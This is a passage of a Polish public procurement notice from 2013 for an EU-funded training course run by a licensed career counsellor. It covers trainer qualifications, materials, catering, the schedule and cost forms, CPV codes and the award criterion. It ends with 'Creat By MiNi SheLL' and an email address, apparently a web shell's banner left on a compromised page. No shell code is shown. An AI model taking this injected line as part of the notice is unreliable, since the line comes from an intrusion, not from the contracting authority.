ankiety ewaluacyjne służące sprawdzaniu efektów szkolenia pod kątem osiąganych celów (zaakceptowane przez Zamawiającego).

Trening prowadzony będzie przez licencjonowanego doradcę zawodowego spełniającego wymagania w stosunku do doradców zgodnie z ustawą o promocji zatrudnienia i instytucjach rynku pracy, którzy okażą Zamawiającemu dyplom poświadczający wykształcenie oraz odpowiednie dokumenty potwierdzające posiadane kompetencje zawodowe i wykażą, że prowadzili w ciągu ostatnich trzech lat trzy szkolenia o podobnej tematyce, skierowane do klientów ośrodków pomocy społecznej, powiatowych centrów pomocy rodzinie lub powiatowych urzędów pracy

Materiały szkoleniowe dla uczestników
Uczestnicy szkolenia winni mieć zapewniony sprzęt, jak również winni otrzymać materiały poświęcone tematyce kursu zaopatrzone w logo UE i POKL oraz notatniki, długopisy, ołówki itp. przybory piśmiennicze. 
W czasie przerw wymagane jest zapewnienie uczestnikom tzw. cateringu: w postaci jednego gorącego posiłku tj. drugiego dania oraz serwisu kawowego tj. kawy, herbaty, ciastek i zimnych napojów. 

Harmonogram, preliminarz kosztów, zaświadczenia
Do oferty należy przedłożyć harmonogram będący propozycją różnych terminów szkoleń, - załącznik nr 7 do niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz sporządzony przez Wykonawcę szczegółowy program szkolenia a także jego treści ( załącznik nr 10). Należy przedstawić preliminarz kosztów zawarty na druku stanowiącym załącznik nr 8 do niniejszej Specyfikacji Istotnych Warunków Zamówienia. Preliminarz winien zawierać wszystkie przedstawione na druku pozycje: m. in. ubezpieczenie od następstw nieszczęśliwych wypadków, koszt cateringu, itp.

Wykonawca dodatkowo wyda uczestnikom kursu certyfikaty o jego ukończeniu na druku stanowiącym załącznik nr 9 do niniejszej Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com